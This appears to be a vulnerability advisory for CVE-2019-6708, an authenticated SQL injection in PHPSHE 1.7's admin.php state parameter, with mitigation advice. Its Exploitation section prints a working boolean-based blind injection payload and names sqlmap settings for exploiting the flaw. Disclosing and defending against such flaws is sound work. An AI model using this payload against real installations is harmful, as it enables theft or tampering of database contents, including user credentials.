CVE-2019-6708

Vulnerability

PHPSHE version 1.7 (build 20180905 UTF8) contains a SQL injection vulnerability in the admin.php endpoint. The state GET parameter is unsafely passed into the pe_selectall function without sanitization, allowing an authenticated attacker to modify the intended SQL query [1]. The vulnerable code path is triggered when accessing admin.php?mod=order&state=wtuan [1].

Exploitation

An attacker needs valid administrative credentials to access the admin panel. The provided Proof of Concept demonstrates a boolean-based blind SQL injection using a crafted payload in the state parameter: wtuan' AND 3809=(SELECT (CASE WHEN (3809=3809) THEN 3809 ELSE (SELECT 6050 UNION SELECT 8971) END))-- LULI [1]. This payload confirms the injection point and allows extraction of database contents through boolean responses. The vulnerability can be exploited using tools like sqlmap with the --dbms=mysql flag at level 3 [1].

Impact

Successful exploitation allows an authenticated administrator to execute arbitrary SQL commands against the underlying MySQL database, leading to information disclosure of all database contents, including user credentials and sensitive application data [1]. The attacker can modify or delete data, potentially compromising the entire application [1].

Mitigation

As of the publication date, no official patch from the vendor has been identified. The recommended solution is to avoid direct parameter splicing in the application code [1]. Administrators should apply input validation and parameterized queries to the state parameter. Since no fixed version is available, limiting access to the admin panel and monitoring for suspicious activity are advised as workarounds [1].